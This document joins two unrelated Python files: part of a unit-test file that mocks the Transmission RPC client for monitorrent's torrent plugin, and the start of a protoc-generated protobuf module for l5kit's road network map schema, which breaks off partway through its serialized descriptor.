def test_add_torrent_without_credentials(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
rpc_client.call.return_value = True
torrent = b'!torrent.content'
self.assertFalse(plugin.add_torrent(torrent, None))
rpc_client.add_torrent.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent_add_torrent_exception(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.add_torrent.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent = b'!torrent.content'
self.assertFalse(plugin.add_torrent(torrent, None))
rpc_client.add_torrent.assert_called_once_with(base64.b64encode(torrent).decode('utf-8'))
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_remove_torrent(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent_hash = 'SomeRandomHashMockString'
self.assertTrue(plugin.remove_torrent(torrent_hash))
rpc_client.remove_torrent.assert_called_once_with(torrent_hash.lower(), delete_data=False)
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_remove_torrent_without_credentials(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
torrent_hash = 'SomeRandomHashMockString'
self.assertFalse(plugin.remove_torrent(torrent_hash))
rpc_client.remove_torrent.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_remove_torrent_remove_torrent_exception(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.remove_torrent.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent_hash = 'SomeRandomHashMockString'
self.assertFalse(plugin.remove_torrent(torrent_hash))
rpc_client.remove_torrent.assert_called_once_with(torrent_hash.lower(), delete_data=False)
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_get_download_dir_success(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.get_session.return_value = transmissionrpc.Session(fields={'download_dir': '/mnt/media/downloads'})
plugin = TransmissionClientPlugin()
assert plugin.get_download_dir() is None
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
assert plugin.get_download_dir() == u'/mnt/media/downloads'
rpc_client.get_session.assert_called_once()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_get_download_dir_exception(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.get_session.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
assert plugin.get_download_dir() is None
rpc_client.get_session.assert_called_once()
# l5kit/l5kit/data/proto/road_network_pb2.py | repo: stefaniespeichert/l5kit | license: Apache-2.0 | hexsha: a3b99f5f5f8b79064dc837e66ede02e694e19754
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: road_network.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='road_network.proto',
package='pb.lyft.maps',
syntax='proto3',
serialized_options=b'Z\004maps',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x12road_network.proto\x12\x0cpb.lyft.maps\x1a google/protobuf/descriptor.proto\x1a\x1bgoogle/protobuf/empty.proto\"\x16\n\x08GlobalId\x12\n\n\x02id\x18\x01 \x01(\x0c\"P\n\x0bGeoLocation\x12\x0e\n\x06lat_e7\x18\x01 \x01(\x0f\x12\x0e\n\x06lng_e7\x18\x02 \x01(\x0f\x12\x15\n\x0b\x61ltitude_cm\x18\x03 \x01(\x11H\x00\x42\n\n\x08\x41ltitude\"N\n\x08GeoFrame\x12)\n\x06origin\x18\x01 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12\x17\n\x0f\x62\x65\x61ring_degrees\x18\x02 \x01(\x02\"7\n\x0fLocalizedString\x12\x15\n\rlanguage_code\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\"\xa8\x01\n\x0fRoadNetworkNode\x12+\n\x08location\x18\x01 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12-\n\rroad_segments\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x0f\n\x07z_level\x18\x03 \x01(\x11\x12(\n\x08junction\x18\x04 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\"\xaa\x01\n\x11\x41\x63\x63\x65ssRestriction\x12\x32\n\x04type\x18\x01 \x01(\x0e\x32$.pb.lyft.maps.AccessRestriction.Type\"a\n\x04Type\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x12\n\x0eNO_RESTRICTION\x10\x01\x12\x0c\n\x08ONLY_HOV\x10\x02\x12\x0c\n\x08ONLY_BUS\x10\x03\x12\r\n\tONLY_BIKE\x10\x04\x12\r\n\tONLY_TURN\x10\x05\"\xaf\x02\n\x11\x44\x61ilyTimeInterval\x12\x45\n\x0f\x64\x61y_of_the_week\x18\x01 \x01(\x0e\x32,.pb.lyft.maps.DailyTimeInterval.DayOfTheWeek\x12 \n\x18start_local_time_seconds\x18\x02 \x01(\x05\x12\x1e\n\x16\x65nd_local_time_seconds\x18\x03 \x01(\x05\x12%\n\x1dtimezone_database_region_name\x18\x04 \x01(\t\"j\n\x0c\x44\x61yOfTheWeek\x12\n\n\x06SUNDAY\x10\x00\x12\n\n\x06MONDAY\x10\x01\x12\x0b\n\x07TUESDAY\x10\x02\x12\r\n\tWEDNESDAY\x10\x03\x12\x0c\n\x08THURSDAY\x10\x04\x12\n\n\x06\x46RIDAY\x10\x05\x12\x0c\n\x08SATURDAY\x10\x06\"C\n\x08Schedule\x12\x37\n\x0e\x64\x61ily_schedule\x18\x01 \x03(\x0b\x32\x1f.pb.lyft.maps.DailyTimeInterval\"]\n\tCondition\x12\x43\n\x18\x64\x61ily_temporal_condition\x18\x01 
\x01(\x0b\x32\x1f.pb.lyft.maps.DailyTimeIntervalH\x00\x42\x0b\n\tcondition\"\xf8\x10\n\x12RoadNetworkSegment\x12+\n\x08vertices\x18\x01 \x03(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12*\n\nstart_node\x18\x02 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12(\n\x08\x65nd_node\x18\x03 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x42\n\x10\x66orward_lane_set\x18\x04 \x01(\x0b\x32(.pb.lyft.maps.RoadNetworkSegment.LaneSet\x12\x43\n\x11\x62\x61\x63kward_lane_set\x18\r \x01(\x0b\x32(.pb.lyft.maps.RoadNetworkSegment.LaneSet\x12\x1f\n\x17num_bidirectional_lanes\x18\x0f \x01(\x05\x12%\n\x05lanes\x18\x0c \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12+\n\x04name\x18\x05 \x03(\x0b\x32\x1d.pb.lyft.maps.LocalizedString\x12>\n\nroad_class\x18\x06 \x01(\x0e\x32*.pb.lyft.maps.RoadNetworkSegment.RoadClass\x12\x12\n\nis_private\x18\x0e \x01(\x08\x12\x14\n\x0cis_toll_road\x18\x11 \x01(\x08\x12J\n\x10travel_direction\x18\x07 \x01(\x0e\x32\x30.pb.lyft.maps.RoadNetworkSegment.TravelDirection\x12\x0f\n\x07z_level\x18\x08 \x01(\x11\x12%\n\x1dspeed_limit_meters_per_second\x18\t \x01(\x02\x12\x38\n0backward_direction_speed_limit_meters_per_second\x18\n \x01(\x02\x12,\n\x0crestrictions\x18\x0b \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x11\n\tdriveable\x18\x14 \x01(\x08\x12@\n\x08walkable\x18\x15 \x01(\x0e\x32..pb.lyft.maps.RoadNetworkSegment.SideOfSegment\x12\x45\n\x10\x66orward_bikeable\x18\x17 \x01(\x0e\x32+.pb.lyft.maps.RoadNetworkSegment.BikeAccess\x12\x46\n\x11\x62\x61\x63kward_bikeable\x18\x18 \x01(\x0e\x32+.pb.lyft.maps.RoadNetworkSegment.BikeAccess\x1a\xef\x02\n\x07LaneSet\x12\x19\n\x11num_driving_lanes\x18\x01 \x01(\x05\x12#\n\x1bnum_left_turn_driving_lanes\x18\x02 \x01(\x05\x12$\n\x1cnum_right_turn_driving_lanes\x18\x03 \x01(\x05\x12+\n#turn_descriptions_for_driving_lanes\x18\x04 \x01(\t\x12Q\n\x10\x62ike_lane_access\x18\x10 
\x03(\x0e\x32\x37.pb.lyft.maps.RoadNetworkSegment.LaneSet.BikeLaneAccess\"~\n\x0e\x42ikeLaneAccess\x12\x17\n\x13UNKNOWN_BIKE_ACCESS\x10\x00\x12\x06\n\x02NO\x10\x01\x12\n\n\x06SHARED\x10\x02\x12\x0e\n\nDESIGNATED\x10\x03\x12\x18\n\x14\x44\x45SIGNATED_BACKWARDS\x10\x04\x12\x15\n\x11\x44\x45SIGNATED_SHARED\x10\x05\"\xbd\x03\n\tRoadClass\x12\x16\n\x12UNKNOWN_ROAD_CLASS\x10\x00\x12\x0c\n\x08MOTORWAY\x10\x01\x12\t\n\x05TRUNK\x10\x02\x12\x0b\n\x07PRIMARY\x10\x03\x12\r\n\tSECONDARY\x10\x04\x12\x0c\n\x08TERTIARY\x10\x05\x12\x0f\n\x0bRESIDENTIAL\x10\x06\x12\x10\n\x0cUNCLASSIFIED\x10\x07\x12\x0b\n\x07SERVICE\x10\x08\x12\x19\n\x15SERVICE_PARKING_AISLE\x10\t\x12\x14\n\x10SERVICE_DRIVEWAY\x10\n\x12\x11\n\rSERVICE_ALLEY\x10\x0b\x12\x1c\n\x18SERVICE_EMERGENCY_ACCESS\x10\x0c\x12\x19\n\x15SERVICE_DRIVE_THROUGH\x10\r\x12\x11\n\rMOTORWAY_LINK\x10\x0e\x12\x0e\n\nTRUNK_LINK\x10\x0f\x12\x10\n\x0cPRIMARY_LINK\x10\x10\x12\x12\n\x0eSECONDARY_LINK\x10\x11\x12\x11\n\rTERTIARY_LINK\x10\x12\x12\x19\n\x15SERVICE_LIVING_STREET\x10\x13\x12\x0e\n\nPEDESTRIAN\x10\x14\x12\x08\n\x04PATH\x10\x15\x12\t\n\x05STEPS\x10\x16\x12\x0c\n\x08\x43YCLEWAY\x10\x17\"\x7f\n\x0fTravelDirection\x12\x1c\n\x18UNKNOWN_TRAVEL_DIRECTION\x10\x00\x12\x0b\n\x07TWO_WAY\x10\x01\x12\x13\n\x0fONE_WAY_FORWARD\x10\x02\x12\x14\n\x10ONE_WAY_BACKWARD\x10\x03\x12\x16\n\x12ONE_WAY_REVERSIBLE\x10\x04\"\x8a\x01\n\rSideOfSegment\x12\x1b\n\x17UNKNOWN_SIDE_OF_SEGMENT\x10\x00\x12\x1a\n\x16\x45ITHER_SIDE_OF_SEGMENT\x10\x01\x12\x10\n\x0cSEGMENT_LEFT\x10\x02\x12\x11\n\rSEGMENT_RIGHT\x10\x03\x12\x1b\n\x17NEITHER_SIDE_OF_SEGMENT\x10\x04\"a\n\nBikeAccess\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0f\n\x0bNOT_ALLOWED\x10\x01\x12\x0b\n\x07\x41LLOWED\x10\x02\x12\n\n\x06SHARED\x10\x03\x12\r\n\tDEDICATED\x10\x04\x12\r\n\tPROTECTED\x10\x05J\x04\x08\x16\x10\x17\"\xc4\x01\n\x08Junction\x12#\n\x1bis_non_trivial_intersection\x18\x04 \x01(\x08\x12\x32\n\x12road_network_nodes\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12%\n\x05lanes\x18\x03 
\x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x38\n\x18traffic_control_elements\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\"\xd7\n\n\x04Lane\x12:\n\x1aparent_segment_or_junction\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12;\n\x12\x61\x63\x63\x65ss_restriction\x18\x0b \x01(\x0b\x32\x1f.pb.lyft.maps.AccessRestriction\x12W\n\x1dorientation_in_parent_segment\x18\x0c \x01(\x0e\x32\x30.pb.lyft.maps.RoadNetworkSegment.TravelDirection\x12\x41\n\x1cturn_type_in_parent_junction\x18\r \x01(\x0e\x32\x1b.pb.lyft.maps.Lane.TurnType\x12)\n\tgeo_frame\x18\x02 \x01(\x0b\x32\x16.pb.lyft.maps.GeoFrame\x12\x32\n\rleft_boundary\x18\x03 \x01(\x0b\x32\x1b.pb.lyft.maps.Lane.Boundary\x12\x33\n\x0eright_boundary\x18\x04 \x01(\x0b\x32\x1b.pb.lyft.maps.Lane.Boundary\x12+\n\x0blanes_ahead\x18\x05 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x39\n\x19\x61\x64jacent_lane_change_left\x18\x06 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12:\n\x1a\x61\x64jacent_lane_change_right\x18\x07 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x30\n\x10traffic_controls\x18\x08 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12.\n\x0eyield_to_lanes\x18\t \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x1c\n\x14\x63\x61n_have_parked_cars\x18\n \x01(\x08\x12%\n\x05tolls\x18\x0e \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1a\xf2\x03\n\x08\x42oundary\x12\x1a\n\x12vertex_deltas_x_cm\x18\x01 \x03(\x11\x12\x1a\n\x12vertex_deltas_y_cm\x18\x02 \x03(\x11\x12\x1a\n\x12vertex_deltas_z_cm\x18\x03 \x03(\x11\x12=\n\x0c\x64ivider_type\x18\x04 \x03(\x0e\x32\'.pb.lyft.maps.Lane.Boundary.DividerType\x12\x1c\n\x14type_change_point_cm\x18\x05 
\x03(\x05\"\xb4\x02\n\x0b\x44ividerType\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x08\n\x04NONE\x10\x01\x12\x17\n\x13SINGLE_YELLOW_SOLID\x10\x02\x12\x16\n\x12SINGLE_WHITE_SOLID\x10\x03\x12\x18\n\x14SINGLE_YELLOW_DASHED\x10\x04\x12\x17\n\x13SINGLE_WHITE_DASHED\x10\x05\x12\x17\n\x13\x44OUBLE_YELLOW_SOLID\x10\x06\x12\x16\n\x12\x44OUBLE_WHITE_SOLID\x10\x07\x12\'\n#DOUBLE_YELLOW_SOLID_FAR_DASHED_NEAR\x10\x08\x12\'\n#DOUBLE_YELLOW_DASHED_FAR_SOLID_NEAR\x10\t\x12\x0c\n\x08\x43URB_RED\x10\n\x12\x0f\n\x0b\x43URB_YELLOW\x10\x0b\x12\x08\n\x04\x43URB\x10\x0c\"f\n\x08TurnType\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0b\n\x07THROUGH\x10\x01\x12\x08\n\x04LEFT\x10\x02\x12\x0e\n\nSHARP_LEFT\x10\x03\x12\t\n\x05RIGHT\x10\x04\x12\x0f\n\x0bSHARP_RIGHT\x10\x05\x12\n\n\x06U_TURN\x10\x06\"\xbd*\n\x15TrafficControlElement\x12+\n\tstop_sign\x18\x07 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12,\n\nyield_sign\x18\x08 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12I\n\tstop_line\x18/ \x01(\x0b\x32\x34.pb.lyft.maps.TrafficControlElement.AuxiliaryElementH\x00\x12I\n\rtraffic_light\x18\x1d \x01(\x0b\x32\x30.pb.lyft.maps.TrafficControlElement.TrafficLightH\x00\x12[\n\x16signal_flashing_yellow\x18\t \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12X\n\x13signal_flashing_red\x18\n \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12T\n\x0fsignal_red_face\x18\x0b \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12W\n\x12signal_yellow_face\x18\x0c \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12V\n\x11signal_green_face\x18\r \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12_\n\x1asignal_left_arrow_red_face\x18\x1e \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x62\n\x1dsignal_left_arrow_yellow_face\x18$ 
\x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x61\n\x1csignal_left_arrow_green_face\x18\x1f \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12`\n\x1bsignal_right_arrow_red_face\x18 \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x63\n\x1esignal_right_arrow_yellow_face\x18% \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x62\n\x1dsignal_right_arrow_green_face\x18! \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x65\n signal_upper_left_arrow_red_face\x18& \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12h\n#signal_upper_left_arrow_yellow_face\x18\' \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12g\n\"signal_upper_left_arrow_green_face\x18( \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12\x66\n!signal_upper_right_arrow_red_face\x18) \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12i\n$signal_upper_right_arrow_yellow_face\x18* \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12h\n#signal_upper_right_arrow_green_face\x18+ \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12V\n\x11signal_red_u_turn\x18, \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12Y\n\x14signal_yellow_u_turn\x18- \x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12X\n\x13signal_green_u_turn\x18. 
\x01(\x0b\x32\x39.pb.lyft.maps.TrafficControlElement.TrafficLightFaceStateH\x00\x12,\n\nspeed_bump\x18\x0f \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12,\n\nspeed_hump\x18\" \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12W\n\x14pedestrian_crosswalk\x18\x10 \x01(\x0b\x32\x37.pb.lyft.maps.TrafficControlElement.PedestrianCrosswalkH\x00\x12\x31\n\x0fkeep_clear_zone\x18\x11 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12:\n\x18pedestrian_crossing_sign\x18\x12 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11signal_ahead_sign\x18\x13 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11no_left_turn_sign\x18\x14 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x34\n\x12no_right_turn_sign\x18\x15 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12?\n\x1dleft_turn_yield_on_green_sign\x18\x16 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x31\n\x0fno_parking_sign\x18\x17 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12.\n\x0cone_way_sign\x18\x18 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x32\n\x10school_zone_sign\x18\x19 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12.\n\x0cparking_zone\x18# \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x31\n\x0fspeed_bump_sign\x18\x1b \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11\x63onstruction_zone\x18\x31 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12@\n\x1estop_here_for_pedestrians_sign\x18\x32 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12Q\n/state_law_stop_for_pedestrian_in_crosswalk_sign\x18\x33 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x41\n\x1fyield_here_for_pedestrians_sign\x18\x34 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12L\n*turning_vehicles_yield_to_pedestrians_sign\x18\x35 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x45\n#state_law_yield_for_pedestrian_sign\x18\x36 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x43\n!railroad_crossing_regulatory_sign\x18\x37 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12@\n\x1erailroad_crossing_warning_sign\x18\x38 
\x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12>\n\x1crailroad_crossing_other_sign\x18\x39 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12=\n\x1broundabout_circulation_sign\x18: \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12=\n\x1broundabout_directional_sign\x18; \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x37\n\x15roundabout_other_sign\x18< \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12:\n\x18no_left_turn_on_red_sign\x18= \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12;\n\x19no_right_turn_on_red_sign\x18> \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x35\n\x13no_turn_on_red_sign\x18? \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x33\n\x11\x64o_not_enter_sign\x18@ \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x30\n\x0eno_u_turn_sign\x18\x41 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x39\n\x17no_left_and_u_turn_sign\x18\x42 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12:\n\x18no_straight_through_sign\x18\x43 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x35\n\x13left_turn_only_sign\x18\x44 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x36\n\x14right_turn_only_sign\x18\x45 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x32\n\x10u_turn_only_sign\x18\x46 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12<\n\x1astraight_through_only_sign\x18G \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12=\n\x1bother_turn_restriction_sign\x18H \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x38\n\x16\x63onstruction_zone_sign\x18I \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12)\n\tgeo_frame\x18\x02 \x01(\x0b\x32\x16.pb.lyft.maps.GeoFrame\x12\x1a\n\x12points_x_deltas_cm\x18\x03 \x03(\x11\x12\x1a\n\x12points_y_deltas_cm\x18\x04 \x03(\x11\x12\x1a\n\x12points_z_deltas_cm\x18\x05 \x03(\x11\x12G\n\rgeometry_type\x18\x30 \x01(\x0e\x32\x30.pb.lyft.maps.TrafficControlElement.GeometryType\x12\x34\n\x10\x63ontrolled_paths\x18\x06 \x03(\x0b\x32\x1a.pb.lyft.maps.LaneSequence\x1ar\n\x13PedestrianCrosswalk\x12.\n\x0etraffic_lights\x18\x01 
\x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12+\n\x0byield_lines\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1aT\n\x10\x41uxiliaryElement\x12@\n primary_traffic_control_elements\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1a\xae\x02\n\x15TrafficLightFaceState\x12_\n\x13yield_rules_when_on\x18\x01 \x03(\x0b\x32\x42.pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet\x12\x1c\n\x14no_right_turn_on_red\x18\x02 \x01(\x08\x1a\x95\x01\n\x08YieldSet\x12$\n\x04lane\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12.\n\x0eyield_to_lanes\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x33\n\x13yield_to_crosswalks\x18\x03 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x1a;\n\x0cTrafficLight\x12+\n\x0b\x66\x61\x63\x65_states\x18\x03 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\"S\n\x0cGeometryType\x12\n\n\x06UKNOWN\x10\x00\x12\t\n\x05POINT\x10\x01\x12\x0f\n\x0bMULTI_POINT\x10\x02\x12\x0e\n\nLINESTRING\x10\x03\x12\x0b\n\x07POLYGON\x10\x04\x42\x06\n\x04TypeJ\x04\x08\x0e\x10\x0f\"\x90\x03\n\x0fSegmentSequence\x12\x30\n\x04type\x18\x01 \x01(\x0e\x32\".pb.lyft.maps.SegmentSequence.Type\x12\x46\n\x08segments\x18\x02 \x03(\x0b\x32\x34.pb.lyft.maps.SegmentSequence.SegmentWithOrientation\x1a\xcf\x01\n\x16SegmentWithOrientation\x12\'\n\x07segment\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12U\n\x0borientation\x18\x02 \x01(\x0e\x32@.pb.lyft.maps.SegmentSequence.SegmentWithOrientation.Orientation\"5\n\x0bOrientation\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0b\n\x07\x46ORWARD\x10\x01\x12\x0c\n\x08\x42\x41\x43KWARD\x10\x02\"1\n\x04Type\x12\x0b\n\x07UNKNOWN\x10\x00\x12\r\n\tFORBIDDEN\x10\x01\x12\r\n\tMANDATORY\x10\x02\"5\n\x0cLaneSequence\x12%\n\x05lanes\x18\x01 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\"C\n\rLaneSequences\x12\x32\n\x0elane_sequences\x18\x01 \x03(\x0b\x32\x1a.pb.lyft.maps.LaneSequence\"b\n\x07Polygon\x12\x31\n\x0eshell_vertices\x18\x01 \x03(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12$\n\x05holes\x18\x02 
\x03(\x0b\x32\x15.pb.lyft.maps.Polygon\"7\n\x0cMultiPolygon\x12\'\n\x08polygons\x18\x01 \x03(\x0b\x32\x15.pb.lyft.maps.Polygon\"\xf1\x05\n\x0e\x41nnotatedShape\x12+\n\x04name\x18\x01 \x03(\x0b\x32\x1d.pb.lyft.maps.LocalizedString\x12\x30\n\x0cmultipolygon\x18\x02 \x01(\x0b\x32\x1a.pb.lyft.maps.MultiPolygon\x12\x39\n\x08\x62uilding\x18\x03 \x01(\x0b\x32%.pb.lyft.maps.AnnotatedShape.BuildingH\x00\x12\x35\n\x06region\x18\x04 \x01(\x0b\x32#.pb.lyft.maps.AnnotatedShape.RegionH\x00\x12\'\n\x05venue\x18\x05 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x39\n\x17\x61\x64ministrative_boundary\x18\x06 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12&\n\x04park\x18\x07 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x12\x38\n\x16\x64rivable_surface_prior\x18\x08 \x01(\x0b\x32\x16.google.protobuf.EmptyH\x00\x1a\xa5\x02\n\x08\x42uilding\x12\x38\n\x04type\x18\x01 \x01(\x0e\x32*.pb.lyft.maps.AnnotatedShape.Building.Type\x12\x15\n\rheight_meters\x18\x02 \x01(\x05\x12\x1b\n\x13\x61\x62ove_ground_floors\x18\x03 \x01(\x05\"\xaa\x01\n\x04Type\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x0e\n\nCOMMERCIAL\x10\x01\x12\x0f\n\x0bRESIDENTIAL\x10\x02\x12\x12\n\x0eTRANSPORTATION\x10\x03\x12\x0c\n\x08HOSPITAL\x10\x04\x12\t\n\x05\x45VENT\x10\x05\x12\x15\n\x11PARKING_STRUCTURE\x10\x06\x12\r\n\tRELIGIOUS\x10\x07\x12\x0f\n\x0b\x45\x44UCATIONAL\x10\x08\x12\x10\n\x0cGOVERNMENTAL\x10\t\x1a\x18\n\x06Region\x12\x0e\n\x06source\x18\x01 \x01(\tB\x06\n\x04Type\"i\n\tLatLngBox\x12-\n\nsouth_west\x18\x01 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12-\n\nnorth_east\x18\x02 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\"\xe8\x06\n\nMapElement\x12\"\n\x02id\x18\x01 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x31\n\x07\x65lement\x18\x02 \x01(\x0b\x32 .pb.lyft.maps.MapElement.Element\x12-\n\x0c\x62ounding_box\x18\x03 \x01(\x0b\x32\x17.pb.lyft.maps.LatLngBox\x12L\n\x15\x61ssociated_conditions\x18\x05 